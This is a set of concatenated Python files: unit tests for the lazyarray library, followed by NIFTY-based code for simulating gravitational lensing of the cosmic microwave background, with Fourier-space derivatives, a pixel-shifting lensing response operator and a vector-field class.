m2 = larray(f, shape=(2, 3))
a3 = 3 * a1 + a2
m3 = 3 * m1 + m2
assert_array_equal(a3[:, (0, 2)],
m3[:, (0, 2)])
def test_evaluate_with_invalid_base_value():
m = larray(range(5))
m.base_value = "foo"
assert_raises(ValueError, m.evaluate)
def test_partially_evaluate_with_invalid_base_value():
m = larray(range(5))
m.base_value = "foo"
assert_raises(ValueError, m._partially_evaluate, 3)
def test_check_bounds_with_invalid_address():
m = larray([[1, 3, 5], [7, 9, 11]])
assert_raises(TypeError, m.check_bounds, (object(), 1))
def test_check_bounds_with_invalid_address2():
m = larray([[1, 3, 5], [7, 9, 11]])
assert_raises(ValueError, m.check_bounds, ([], 1))
def test_partially_evaluate_constant_array_with_one_element():
m = larray(3, shape=(1,))
a = 3 * np.ones((1,))
m1 = larray(3, shape=(1, 1))
a1 = 3 * np.ones((1, 1))
m2 = larray(3, shape=(1, 1, 1))
a2 = 3 * np.ones((1, 1, 1))
assert_equal(a[0], m[0])
assert_equal(a.shape, m.shape)
assert_equal(a[:].shape, m[:].shape)
assert_equal(a, m.evaluate())
assert_equal(a1.shape, m1.shape)
assert_equal(a1[0,:].shape, m1[0,:].shape)
assert_equal(a1[:].shape, m1[:].shape)
assert_equal(a1, m1.evaluate())
assert_equal(a2.shape, m2.shape)
assert_equal(a2[:, 0,:].shape, m2[:, 0,:].shape)
assert_equal(a2[:].shape, m2[:].shape)
assert_equal(a2, m2.evaluate())
def test_partially_evaluate_constant_array_with_boolean_index():
m = larray(3, shape=(4, 5))
a = 3 * np.ones((4, 5))
addr_bool = np.array([True, True, False, False, True])
addr_int = np.array([0, 1, 4])
assert_equal(a[::2, addr_bool].shape, a[::2, addr_int].shape)
assert_equal(a[::2, addr_int].shape, m[::2, addr_int].shape)
assert_equal(a[::2, addr_bool].shape, m[::2, addr_bool].shape)
def test_partially_evaluate_constant_array_with_all_boolean_indices_false():
m = larray(3, shape=(3,))
a = 3 * np.ones((3,))
addr_bool = np.array([False, False, False])
assert_equal(a[addr_bool].shape, m[addr_bool].shape)
def test_partially_evaluate_constant_array_with_only_one_boolean_indice_true():
m = larray(3, shape=(3,))
a = 3 * np.ones((3,))
addr_bool = np.array([False, True, False])
assert_equal(a[addr_bool].shape, m[addr_bool].shape)
assert_equal(m[addr_bool][0], a[0])
def test_partially_evaluate_constant_array_with_boolean_indice_as_random_valid_ndarray():
m = larray(3, shape=(3,))
a = 3 * np.ones((3,))
addr_bool = np.random.rand(3) > 0.5
while not addr_bool.any():
# random array, but not [False, False, False]
addr_bool = np.random.rand(3) > 0.5
assert_equal(a[addr_bool].shape, m[addr_bool].shape)
assert_equal(m[addr_bool][0], a[addr_bool][0])
def test_partially_evaluate_constant_array_size_one_with_boolean_index_true():
m = larray(3, shape=(1,))
a = np.array([3])
addr_bool = np.array([True])
m1 = larray(3, shape=(1, 1))
a1 = 3 * np.ones((1, 1))
addr_bool1 = np.array([[True]], ndmin=2)
assert_equal(m[addr_bool][0], a[0])
assert_equal(m[addr_bool], a[addr_bool])
assert_equal(m[addr_bool].shape, a[addr_bool].shape)
assert_equal(m1[addr_bool1][0], a1[addr_bool1][0])
assert_equal(m1[addr_bool1].shape, a1[addr_bool1].shape)
def test_partially_evaluate_constant_array_size_two_with_boolean_index_true():
m2 = larray(3, shape=(1, 2))
a2 = 3 * np.ones((1, 2))
addr_bool2 = np.ones((1, 2), dtype=bool)
assert_equal(m2[addr_bool2][0], a2[addr_bool2][0])
assert_equal(m2[addr_bool2].shape, a2[addr_bool2].shape)
def test_partially_evaluate_constant_array_size_one_with_boolean_index_false():
m = larray(3, shape=(1,))
m1 = larray(3, shape=(1, 1))
a = np.array([3])
a1 = np.array([[3]], ndmin=2)
addr_bool = np.array([False])
addr_bool1 = np.array([[False]], ndmin=2)
addr_bool2 = np.array([False])
assert_equal(m[addr_bool].shape, a[addr_bool].shape)
assert_equal(m1[addr_bool1].shape, a1[addr_bool1].shape)
def test_partially_evaluate_constant_array_size_with_empty_boolean_index():
m = larray(3, shape=(1,))
a = np.array([3])
addr_bool = np.array([], dtype='bool')
assert_equal(m[addr_bool].shape, a[addr_bool].shape)
assert_equal(m[addr_bool].shape, (0,))
def test_partially_evaluate_functional_array_with_boolean_index():
m = larray(lambda i, j: 5 * i + j, shape=(4, 5))
a = np.arange(20.0).reshape((4, 5))
addr_bool = np.array([True, True, False, False, True])
addr_int = np.array([0, 1, 4])
assert_equal(a[::2, addr_bool].shape, a[::2, addr_int].shape)
assert_equal(a[::2, addr_int].shape, m[::2, addr_int].shape)
assert_equal(a[::2, addr_bool].shape, m[::2, addr_bool].shape)
def test_getslice_with_vectorized_iterable():
input = MockRNG(0, 1)
m = larray(input, shape=(7, 3))
assert_array_equal(m[::2, (0, 2)],
np.arange(8).reshape((4, 2)))
def test_equality_with_lazyarray():
m1 = larray(42.0, shape=(4, 5)) / 23.0 + 2.0
m2 = larray(42.0, shape=(4, 5)) / 23.0 + 2.0
assert_equal(m1, m2)
def test_equality_with_number():
m1 = larray(42.0, shape=(4, 5))
m2 = larray([42, 42, 42])
m3 = larray([42, 42, 43])
m4 = larray(42.0, shape=(4, 5)) + 2
assert_equal(m1, 42.0)
assert_equal(m2, 42)
assert_not_equal(m3, 42)
assert_raises(Exception, m4.__eq__, 44.0)
def test_equality_with_array():
m1 = larray(42.0, shape=(4, 5))
target = 42.0 * np.ones((4, 5))
assert_raises(TypeError, m1.__eq__, target)
def test_deepcopy():
m1 = 3 * larray(lambda i, j: 5 * i + j, shape=(4, 5)) + 2
m2 = deepcopy(m1)
m1.shape = (3, 4)
m3 = deepcopy(m1)
assert_equal(m1.shape, m3.shape, (3, 4))
assert_equal(m2.shape, (4, 5))
assert_array_equal(m1.evaluate(), m3.evaluate())
def test_deepcopy_with_ufunc():
m1 = sqrt(larray([x ** 2 for x in range(5)]))
m2 = deepcopy(m1)
m1.base_value[0] = 49
assert_array_equal(m1.evaluate(), np.array([7, 1, 2, 3, 4]))
assert_array_equal(m2.evaluate(), np.array([0, 1, 2, 3, 4]))
def test_set_shape():
m = larray(42) + larray(lambda i: 3 * i)
assert_equal(m.shape, None)
m.shape = (5,)
assert_array_equal(m.evaluate(), np.array([42, 45, 48, 51, 54]))
def test_call():
A = larray(np.array([1, 2, 3]), shape=(3,)) - 1
B = 0.5 * larray(lambda i: 2 * i, shape=(3,))
C = B(A)
assert_array_equal(C.evaluate(), np.array([0, 1, 2]))
assert_array_equal(A.evaluate(), np.array([0, 1, 2])) # A should be unchanged
def test_call2():
positions = np.array(
[[0., 2., 4., 6., 8.],
[0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0.]])
def position_generator(i):
return positions.T[i]
def distances(A, B):
d = A - B
d **= 2
d = np.sum(d, axis=-1)
np.sqrt(d, d)
return d
def distance_generator(f, g):
def distance_map(i, j):
return distances(f(i), g(j))
return distance_map
distance_map = larray(distance_generator(position_generator, position_generator),
shape=(4, 5))
f_delay = 1000 * larray(lambda d: 0.1 * (1 + d), shape=(4, 5))
assert_array_almost_equal(
f_delay(distance_map).evaluate(),
np.array([[100, 300, 500, 700, 900],
[300, 100, 300, 500, 700],
[500, 300, 100, 300, 500],
[700, 500, 300, 100, 300]], dtype=float),
decimal=12)
# repeat, should be idempotent
assert_array_almost_equal(
f_delay(distance_map).evaluate(),
np.array([[100, 300, 500, 700, 900],
[300, 100, 300, 500, 700],
[500, 300, 100, 300, 500],
[700, 500, 300, 100, 300]], dtype=float),
decimal=12)
def test__issue4():
# In order to avoid the errors associated with version changes of numpy, mask1 and mask2 no longer contain boolean values but integer values
a = np.arange(12).reshape((4, 3))
b = larray(np.arange(12).reshape((4, 3)))
mask1 = (slice(None), int(True))
mask2 = (slice(None), np.array([int(True)]))
assert_equal(b[mask1].shape, partial_shape(mask1, b.shape), a[mask1].shape)
assert_equal(b[mask2].shape, partial_shape(mask2, b.shape), a[mask2].shape)
def test__issue3():
a = np.arange(12).reshape((4, 3))
b = larray(a)
c = larray(lambda i, j: 3*i + j, shape=(4, 3))
assert_array_equal(a[(1, 3), :][:, (0, 2)], b[(1, 3), :][:, (0, 2)])
assert_array_equal(b[(1, 3), :][:, (0, 2)], c[(1, 3), :][:, (0, 2)])
assert_array_equal(a[(1, 3), (0, 2)], b[(1, 3), (0, 2)])
assert_array_equal(b[(1, 3), (0, 2)], c[(1, 3), (0, 2)])
def test_partial_shape():
a = np.arange(12).reshape((4, 3))
test_cases = [
(slice(None), (4, 3)),
((slice(None), slice(None)), (4, 3)),
(slice(1, None, 2), (2, 3)),
(1, (3,)),
((1, slice(None)), (3,)),
([0, 2, 3], (3, 3)),
(np.array([0, 2, 3]), (3, 3)),
((np.array([0, 2, 3]), slice(None)), (3, 3)),
(np.array([True, False, True, True]), (3, 3)),
#(np.array([True, False]), (1, 3)), # not valid with NumPy 1.13
(np.array([[True, False, False], [False, False, False], [True, True, False], [False, True, False]]), (4,)),
#(np.array([[True, False, False], [False, False, False], [True, True, False]]), (3,)), # not valid with NumPy 1.13
((3, 1), tuple()),
((slice(None), 1), (4,)),
((slice(None), slice(1, None, 3)), (4, 1)),
((np.array([0, 3]), 2), (2,)),
((np.array([0, 3]), np.array([1, 2])), (2,)),
((slice(None), np.array([2])), (4, 1)),
(((1, 3), (0, 2)), (2,)),
(np.array([], bool), (0, 3)),
]
for mask, expected_shape in test_cases:
assert_equal(partial_shape(mask, a.shape), a[mask].shape)
assert_equal(partial_shape(mask, a.shape), expected_shape)
b = np.arange(5)
test_cases = [
(np.arange(5), (5,))
]
for mask, expected_shape in test_cases:
assert_equal(partial_shape(mask, b.shape), b[mask].shape)
assert_equal(partial_shape(mask, b.shape), expected_shape)
def test_is_homogeneous():
m0 = larray(10, shape=(5,))
m1 = larray(np.arange(1, 6))
m2 = m0 + m1
m3 = 9 + m0 / m1
assert m0.is_homogeneous
assert not m1.is_homogeneous
assert not m2.is_homogeneous
assert not m3.is_homogeneous
```
#### File: lazyarray/test/test_lazy_arrays_from_Sparse_Matrices.py
```python
import numpy as np
from lazyarray import larray
from scipy import sparse
import random
################
# Random numbers
################
i = random.randint(-100, 100)
j = random.randint(-100, 100)
k = random.randint(-100, 100)
l = random.randint(-100, 100)
m = random.randint(-100, 100)
n = random.randint(-100, 100)
p = random.randint(-100, 100)
q = random.randint(-100, 100)
r = random.randint(-100, 100)
################
# An example
################
#i = 1
#j = 2
#k = 0
#l = 0
#m = 0
#n = 3
#p = 1
#q = 0
#r = 4
#print "i =", i
#print "j =", j
#print "k =", k
#print "l =", l
#print "m =", m
#print "n =", n
#print "p =", p
#print "q =", q
#print "r =", r
##############################################################
# Definition of an array
##############################################################
def test_function_array_general():
A = np.array([[i, j, k], [l, m, n], [p, q, r]])
#print "A ="
#print A
return A
##############################################################
# Definition of 7 sparse matrices
##############################################################
def sparse_csc_matrices():
csc = sparse.csc_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "csc matrices ="
#print csc
return csc
def sparse_csr_matrices():
csr = sparse.csr_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "csr matrices ="
#print csr
return csr
def sparse_bsr_matrices():
bsr = sparse.bsr_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "bsr matrices ="
#print bsr
return bsr
def sparse_lil_matrices():
lil = sparse.lil_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "lil matrices ="
#print lil
return lil
def sparse_dok_matrices():
dok = sparse.dok_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "dok matrices ="
#print dok
return dok
def sparse_coo_matrices():
coo = sparse.coo_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "coo matrices ="
#print coo
return coo
def sparse_dia_matrices():
dia = sparse.dia_matrix([[i, j, k], [l, m, n], [p, q, r]])
#print "dia matrices ="
#print dia
return dia
if __name__ == "__main__":
##############################################################
# Call test_function_array_general
# Create a sparse matrix from array
# There are 7 sparse matrices
##############################################################
#print "Array general ="
test_function_array_general()
#print "Array ="
#print test_function_array_general()
# print "----"
# print "Sparse array csc general ="
sA_csc_general = sparse.csc_matrix(test_function_array_general())
#print ("sparse csc matrices", sparse.csc_matrix(test_function_array_general()))
#print "sparse csc matrices ="
#print sA_csc_general
# print "----"
# print "Sparse array csr general ="
sA_csr = sparse.csr_matrix(test_function_array_general())
#print ("sparse csr matrices", sparse.csr_matrix(test_function_array_general()))
#print "sparse csr matrices ="
#print sA_csr
# print "----"
# print "Sparse array bsr general ="
sA_bsr = sparse.bsr_matrix(test_function_array_general())
# print ("sparse bsr matrices", sparse.bsr_matrix(test_function_array_general()))
# print "sparse bsr matrices ="
# print sA_bsr
# print "----"
# print "Sparse array lil general ="
sA_lil = sparse.lil_matrix(test_function_array_general())
# print ("sparse lil matrices", sparse.lil_matrix(test_function_array_general()))
# print "sparse lil matrices ="
# print sA_lil
# print "----"
# print "Sparse array dok general ="
sA_dok = sparse.dok_matrix(test_function_array_general())
# print ("sparse dok matrices", sparse.dok_matrix(test_function_array_general()))
# print "sparse dok matrices ="
# print sA_dok
# print "----"
# print "Sparse array coo general ="
sA_coo = sparse.coo_matrix(test_function_array_general())
# print ("sparse coo matrices", sparse.coo_matrix(test_function_array_general()))
# print "sparse coo matrices ="
# print sA_coo
# print "----"
# print "Sparse array dia general ="
sA_dia = sparse.dia_matrix(test_function_array_general())
# print ("sparse dia matrices", sparse.dia_matrix(test_function_array_general()))
# print "sparse dia matrices ="
# print sA_dia
#print "----------------------------------------------------------------------"
##############################################################
# Call the sparse matrices
# Create a lazy array from sparse matrices
##############################################################
Array_csc_matrices = sparse_csc_matrices().toarray()
#print "Array csc matrices ="
#print Array_csc_matrices
Array_csr_matrices = sparse_csr_matrices().toarray()
#print "Array csr matrices ="
#print Array_csr_matrices
Array_bsr_matrices = sparse_bsr_matrices().toarray()
#print "Array bsr matrices ="
#print Array_bsr_matrices
Array_lil_matrices = sparse_lil_matrices().toarray()
#print "Array lil matrices ="
#print Array_lil_matrices
Array_dok_matrices = sparse_dok_matrices().toarray()
#print "Array dok matrices ="
#print Array_dok_matrices
Array_coo_matrices = sparse_coo_matrices().toarray()
#print "Array coo matrices ="
#print Array_coo_matrices
Array_dia_matrices = sparse_dia_matrices().toarray()
#print "Array dia matrices ="
#print Array_dia_matrices
```
{
"source": "jpbreuer/CMB-2D-grav_lensing-with-nifty",
"score": 3
}
#### File: jpbreuer/CMB-2D-grav_lensing-with-nifty/derivatives.py
```python
from vector_field import *
about.hermitianize.off()
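# Derivatives are taken in Fourier space, so hermitianization is switched off up front
# (otherwise the functions below would only print a warning and carry on).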
def Nabla_discrete(k_space,s_space=None,kfield=None):
"""
This function returns the difference operator represented in Fourier
space.
"""
if(about.hermitianize.status):
        print('It is not recommended to calculate derivatives in')
        print('Fourier space while hermitianize is on.')
        print("Please type 'about.hermitianize.off()' to switch off hermitianization.")
if(kfield is None):
kfield = position_field(k_space)
if(s_space is None):
s_space = k_space.get_codomain()
Ndim = k_space.naxes()
basis_vectors = [np.zeros(Ndim) for ii in range(Ndim) ]
for ii in range(Ndim):
basis_vectors[ii][ii] = s_space.vol[ii]
Nabla = [exp((0.+1.j)*2*pi*kfield.vec_dot(basis_vectors[ii]))-1. for ii in range(Ndim)]
val = np.array([Nabla[ii].val/s_space.vol[ii] for ii in range(len(s_space.vol))])
Nabla = vector_field(k_space,Ndim=k_space.naxes(),target=s_space,val=val)
return Nabla
def Nabla_continuous(k_space,s_space=None,kfield=None):
"""
This function returns the differential operator represented in Fourier
space.
i 2 \pi \vec{k}
"""
if(about.hermitianize.status):
        print('It is not recommended to calculate derivatives in')
        print('Fourier space while hermitianize is on.')
        print("Please type 'about.hermitianize.off()' to switch off hermitianization.")
if(kfield is None):
kfield = position_field(k_space)
if(s_space is None):
s_space = k_space.get_codomain()
Nabla = (0.+1.j)*2*pi*kfield
return Nabla
def curl(x,Nabla):
"""
This function returns the curl of a field x.
x needs to be a vector field.
k_Nabla needs to be the Nabla operator in Fourier representation.
"""
return (Nabla.cross(x.transform())).transform()
def div(x,Nabla):
"""
This function returns the divergence of a field x.
x needs to be a vector field.
k_Nabla needs to be the Nabla operator in Fourier representation.
"""
return (Nabla.vec_dot(x.transform())).transform()
def grad(x,Nabla):
"""
This function returns the gradient of a field x.
x needs to be a scalar field.
k_Nabla needs to be the Nabla operator in Fourier representation.
"""
return (Nabla*(x.transform())).transform()
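# Hedged usage sketch (assumption, not part of the original module): for a scalar field
# `x` living on an rg_space `s_space` with Fourier codomain `k_space`, one could compute
#   Nabla = Nabla_discrete(k_space, s_space=s_space)
#   gx = grad(x, Nabla)
# and, for a vector_field `v`, div(v, Nabla) and curl(v, Nabla) analogously.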
```
#### File: jpbreuer/CMB-2D-grav_lensing-with-nifty/FlatLensingResponse.py
```python
from __future__ import division
from nifty import *
#--- For Maksim's Derivatives Implementation --->
from vector_field import *
from derivatives import *
#--- Other --->
note = notification()
#--- CMB Lensing Response --->
class LensingResponse(response_operator):
def __init__(self, config, lensing_potential=None):
"""
Parameters
-----------
lensing_potential : field | default = None
            If an explicit potential field is passed, it is used as a fixed lensing
            potential; with the default (None), a realisation is drawn from the power
            spectrum supplied in the config.
"""
#@profile
if (not isinstance (config.domain, space)):
raise TypeError(about._errors.cstring("ERROR: invalid input."))
self.domain = config.domain
self.target = config.domain
self.pixels = config.pixels
self.codomain = config.codomain
self.distance = config.distance
self.path = config.path
self.test = config.test
self.NFW_profile = config.NFW_profile
self.sym = False
self.uni = False
self.imp = True
#--- From test --->
if (self.test == True):
self.testlensing_potential = config.testlensing_potential
if (self.testlensing_potential.domain.fourier == False):
self.lensing_potential = self.testlensing_potential.transform()
# print(self.lensing_potential.domain)
print("Test case activated!")
else:
#--- Default explicit --->
if (self.NFW_profile == True):
self.lensing_potential = config.lensing_potential.transform()
if (self.lensing_potential.domain.fourier == False):
self.lensing_potential = self.lensing_potential.transform()
print("R-Operator: Lensing Potential in rg-space was passed")
else:
if (lensing_potential == None): # Takes a fixed and explicit potential
self.lensing_potential = config.C_Psi.get_random_field(domain = config.codomain, target = config.domain)
if (self.lensing_potential.domain.fourier == False):
self.lensing_potential = self.lensing_potential.transform()
# print(self.lensing_potential.domain)
print("R-Operator: Lensing Potential was created")
#--- Gradient --->
self.gradient_x = self.gradientfield(self.lensing_potential)[0]
self.gradient_y = self.gradientfield(self.lensing_potential)[1]
# print("A_x")
# print(self.gradient_x)
# print("B_y")
# print(self.gradient_y)
#--- Delta X --->
self.xshift = self.pix2shift(self.gradient_x)[0]
# print("DeltaX: ")
# print(self.xshift)
#--- Transform X --->
self.xposition = self.pix2shift(self.gradient_x)[1]
# print("PositionX: ")
# print(self.xposition)
#--- Delta Y --->
self.yshift = self.pix2shift(self.gradient_y)[0]
# print("DeltaY: ")
# print(self.yshift)
#--- Transform Y --->
self.yposition = self.pix2shift(self.gradient_y)[2]
# print("PositionY: ")
# print(self.yposition)
def pix2shift(self, field):
"""
Parameters
-----------
field : array
Takes a field or gradient field
Function then rounds values to appropriate pixel,
returns the delta coordinates of the given field,
then returns the positions of x and y
"""
#--- Get Dimensions --->
pixels = field.shape[0]
#--- For Delta --->
deltashift = np.round(field / self.distance).astype(float)
# print("Delta: ")
# print(field/self.distance)
#--- Adjust Boundary Conditions for Delta --->
        pixelshift = deltashift / pixels  # number of full wraps around the grid; the fractional part is the in-grid shift
pixelshiftint = pixelshift.astype(int)
deltashift = (pixelshift - pixelshiftint) * pixels
# deltashift[deltashift < 0] += pixels # adjust for negative values
deltashift = deltashift.astype(float)
#--- Define Empty Array --->
zeroarray = np.zeros(shape = (deltashift.shape)).astype(float)
#--- For X --->
xarray = np.array(range(pixels)).astype(float)
xpositions = zeroarray + xarray[None,:]
newx = deltashift + xpositions
#--- Boundary Conditions --->
newx[newx < 0] += pixels
newx[newx >= pixels] -= pixels
#print(newx)
#--- For Y --->
yarray = np.array(range(pixels)).astype(float)
ypositions = zeroarray + yarray[:,None]
newy = deltashift + ypositions
# print("Before")
# print(newy)
#--- Boundary Conditions --->
newy[newy < 0] += pixels
newy[newy >= pixels] -= pixels
# print("After")
# print(newy)
return deltashift, newx, newy
def gradientfield(self, field):
"""
Parameters
-----------
field : array
Takes any given field
Function then calculates the discrete or continuous gradient field using Maksim's implementation
see 'derivatives.py'
"""
#--- Nabla Operator --->
# p = position_field(self.domain)
# print("P", p.val)
##test for Ripple effect
# deri_cont = Nabla_continuous(self.codomain) #The Fourier transform of the continuous derivative
deri_disc = Nabla_discrete(self.codomain) #The Fourier transform of the discrete derivative
#--- Compute Gradient Field --->
#--- SUPER IMPORTANT ---> !!!!!
gradient = (deri_disc * field).transform()
# gradient = (deri_disc * field.transform()).transform()
#--- Compute Divergence
# divergence = (deri_cont.vec_dot(a.transform())).transform()
# print("Divergence_a: ", div(a,deri_cont)) #divergence of a
#--- Compute Curl --->
# curl = (deri_cont.cross(a.transform())).transform()
# print("Curl_a: ", curl(a,deri_cont)) #curl of a
return gradient
def _multiply(self, x, **kwargs):
"""
Parameters
-----------
x : array
takes signal as input
this is the pixel shifting function, returns the LensedField
d = R(s)
"""
self.lensed = np.zeros(shape = (self.pixels, self.pixels)).astype(float)
for i in np.arange(self.pixels):
for j in np.arange(self.pixels):
self.lensed[i][j] = x[self.yposition[i][j]][self.xposition[i][j]]
# print("Lensed Field: ")
# print(self.lensed.astype(float))
LensedField = field(self.domain, val = self.lensed)
# LensedField.plot(power = False)
return LensedField
def _adjoint_multiply(self, x, **kwargs):
"""
Parameters
-----------
x : array
takes data as input
        this is the adjoint operation: output pixels that no data pixel maps back to stay zero (loss of data)
s_hat = R_dagger(d)
the function also sums pixels that are shifted to the same location
if s(alpha) = s_hat(beta):
then d(alpha) + d(beta)
"""
adjointlensed = np.zeros(shape = (self.pixels, self.pixels)).astype(float)
for i in np.arange(self.pixels):
for j in np.arange(self.pixels):
# Either if statement or "+=" in the else: statement
# if (adjointlensed[self.yposition[i][j]][self.xposition[i][j]] == x[self.yposition[i][j]][self.xposition[i][j]]):
# adjointlensed[self.yposition[i][j]][self.xposition[i][j]] = self.lensed[i][j] + x[i][j]
# else:
adjointlensed[self.yposition[i][j]][self.xposition[i][j]] += x[i][j]
# print("AdjointLensed: ")
# print(adjointlensed.astype(float))
AdjointLensedField = field(self.domain, val=adjointlensed)
# RevLensedField.plot(power = False)
return AdjointLensedField
```
#### File: jpbreuer/CMB-2D-grav_lensing-with-nifty/vector_field.py
```python
from nifty import *
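# vector_field bundles Ndim component fields over a nested_space (a point_space for the
# components nested with the underlying domain) and adds componentwise algebra such as
# cross, vec_dot, vec_mul and vec_div on top of the scalar nifty field class.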
class vector_field(field):
def __init__(self,domain,Ndim=None,target=None,val=None,domain_explicit=False,**kwargs):
if(domain_explicit):
## check domain
if(not isinstance(domain,space)):
raise TypeError(about._errors.cstring("ERROR: invalid input."))
self.domain = domain
## check codomain
if(target is None):
target = domain.get_codomain()
else:
self.domain.check_codomain(target)
self.target = target
else:
## check domain
if(not isinstance(domain,space)):
raise TypeError(about._errors.cstring("ERROR: invalid input."))
if(Ndim is None):
Ndim = domain.naxes()
self.domain = nested_space([point_space(Ndim),domain])
## check codomain
if(target is None):
target = domain.get_codomain()
else:
domain.check_codomain(target)
self.target = nested_space([self.domain.nest[0],target])
if(val is None):
vals = self.domain.nest[1].get_random_values(codomain=self.target.nest[1],**kwargs)
self.val = np.expand_dims(vals,0)
for ii in range(1,Ndim):
vals = self.domain.nest[1].get_random_values(codomain=self.target.nest[1],**kwargs)
vals = np.expand_dims(vals,0)
self.val = np.append(self.val,vals,axis=0)
else: self.val = self.domain.enforce_values(val,extend=True)
def transform(self,target=None,**kwargs):
if(not(target is None)):
target_domain = nested_space([self.target.nest[0],target])
res = super(vector_field,self).transform(target=target,overwrite=False,**kwargs)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
def power(self,**kwargs):
if("codomain" in kwargs):
kwargs.__delitem__("codomain")
pp = self.domain.nest[1].calc_power(self.val[0],codomain=self.target.nest[1],**kwargs)
for ii in range(1,self.Ndim()):
pp += self.domain.nest[1].calc_power(self.val[ii],codomain=self.target.nest[1],**kwargs)
return pp
def __pos__(self):
return vector_field(self.domain,val=+self.val,target=self.target,domain_explicit=True)
def __neg__(self):
return vector_field(self.domain,val=-self.val,target=self.target,domain_explicit=True)
def __abs__(self):
if(np.iscomplexobj(self.val)):
return np.absolute(self.val)
else:
return vector_field(self.domain,val=np.absolute(self.val),target=self.target,domain_explicit=True)
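    # The methods below implement componentwise vector algebra: `cross` and `vec_dot`
    # combine vector fields into a new vector or scalar field, while `vec_mul` / `vec_div`
    # scale each component by a per-component factor (a field over the component space or
    # a length-Ndim array), falling back to ordinary __mul__ / __div__ otherwise.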
def cross(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
return vector_field(x.domain,target=x.target,domain_explicit=True,val=np.cross(self.val.astype(x.domain.datatype),x.val,axis=0))
else:
return vector_field(self.domain,target=self.target,domain_explicit=True,val=np.cross(self.val,x.val.astype(self.domain.datatype),axis=0))
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=np.cross(self.val,x,axis=0))
def vec_dot(self,x):
if(isinstance(x,field)):
return field(self.domain.nest[1],target=self.target.nest[1],val=(self.__mul__(x)).val.sum(axis=0))
elif(isinstance(x,np.ndarray)):
if(x.shape == (self.Ndim(),)):
res = self.component(0)*x[0]
for ii in range(1,self.Ndim()):
res += self.component(ii)*x[ii]
return res
else:
return field(self.domain.nest[1],target=self.target.nest[1],val=(self.__mul__(x)).val.sum(axis=0))
else:
return field(self.domain.nest[1],target=self.target.nest[1],val=(self.__mul__(x)).val.sum(axis=0))
def vec_mul(self,x):
if(isinstance(x,field)):
if(self.domain.nest[0]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
val = np.array([self.val.astype(x.domain.datatype)[iii]*x.val[iii] for iii in range(len(x.val))])
return vector_field(nested_space([x.domain,self.domain.nest[1]]),target=nested_space([x.domain.get_codomain(),self.target.nest[1]]),domain_explicit=True,val=val)
else:
val = np.array([self.val[iii]*x.val.astype(self.domain.datatype)[iii] for iii in range(len(x.val))])
return vector_field(self.domain,target=self.target,domain_explicit=True,val=val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
elif(isinstance(x,np.ndarray)):
if(x.shape==(self.Ndim(),)):
val = np.array([self.val[iii]*x.astype(self.domain.datatype)[iii] for iii in range(len(x))])
return vector_field(self.domain,target=self.target,domain_explicit=True,val=val)
else:
return self.__mul__(x)
else:
return self.__mul__(x)
def vec_div(self,x):
if(isinstance(x,field)):
if(self.domain.nest[0]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
val = np.array([self.val.astype(x.domain.datatype)[iii]/x.val[iii] for iii in range(len(x.val))])
return vector_field(nested_space([x.domain,self.domain.nest[1]]),target=nested_space([x.domain.get_codomain(),self.target.nest[1]]),domain_explicit=True,val=val)
else:
val = np.array([self.val[iii]/x.val.astype(self.domain.datatype)[iii] for iii in range(len(x.val))])
return vector_field(self.domain,target=self.target,domain_explicit=True,val=val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
elif(isinstance(x,np.ndarray)):
if(x.shape==(self.Ndim(),)):
val = np.array([self.val[iii]/x.astype(self.domain.datatype)[iii] for iii in range(len(x))])
return vector_field(self.domain,target=self.target,domain_explicit=True,val=val)
else:
return self.__div__(x)
else:
return self.__div__(x)
def __mul__(self,x): ## __mul__ : self * x
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__mul__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = self.val.astype(x.domain.datatype)*x.val
res_domain = nested_space([self.domain.nest[0],x.domain])
res_target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
return vector_field(res_domain,target=res_target,domain_explicit=True,val=res_val)
else:
res_val = self.val*x.val.astype(self.domain.datatype)
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
else:
raise ValueError(about._errors.cstring("ERROR: incompatible domains."))
else:
res_val = self.domain.enforce_values(x,extend=False)
res_val = self.val*res_val
return vector_field(self.domain,target=self.target,domain_explicit=True,val=res_val)
__rmul__ = __mul__ ## __rmul__ : x * self
def __imul__(self,x): ## __imul__ : self *= x
if(isinstance(x,field)):
if(self.domain==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = x.domain
self.val *= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = x.domain.get_codomain()
else:
self.val *= x.val.astype(self.domain.datatype)
elif(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
self.domain = nested_space([self.domain.nest[0],x.domain])
self.val *= x.val
about.warnings.cprint("WARNING: codomain set to default.")
self.target = nested_space([self.domain.nest[0],x.domain.get_codomain()])
else:
self.val *= x.val.astype(self.domain.datatype)
else:
raise ValueError(about._errors.cstring("ERROR: inequal domains."))
else:
x = self.domain.enforce_values(x,extend=False)
self.val *= x
return self
def __div__(self,x):
if(isinstance(x,field)):
if(self.domain==x.domain):
res = super(vector_field,self).__div__(x)
return vector_field(res.domain,target=res.target,domain_explicit=True,val=res.val)
else:
if(self.domain.nest[1]==x.domain):
if(x.domain.datatype>self.domain.datatype):
about.warnings.cprint("WARNING: codomain set to default.")
res_val = self.val.astype(x.domain.datatype)/x.val
res_domain = nested_space([self.domain.nest[0],x.domain])
